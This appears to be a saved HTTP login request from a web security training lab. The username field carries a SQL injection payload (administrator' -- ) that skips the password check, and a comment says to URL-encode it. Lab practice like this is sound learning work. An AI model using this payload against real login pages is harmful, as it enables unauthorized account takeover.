POST /login HTTP/1.1
Host: ac221f3f1f55917f8035bd2200350083.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac221f3f1f55917f8035bd2200350083.web-security-academy.net/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Connection: close
Cookie: session=M0ymMaLlfZvT11iphFuLjukd5MAsqZok
Upgrade-Insecure-Requests: 1

csrf=n6k5dBM3zfSqnsPi2Bux9d9D1E6LF759&username=administrator' -- &password=kiddie

// Remember to URL encode the payload.
// In this form for easier reading
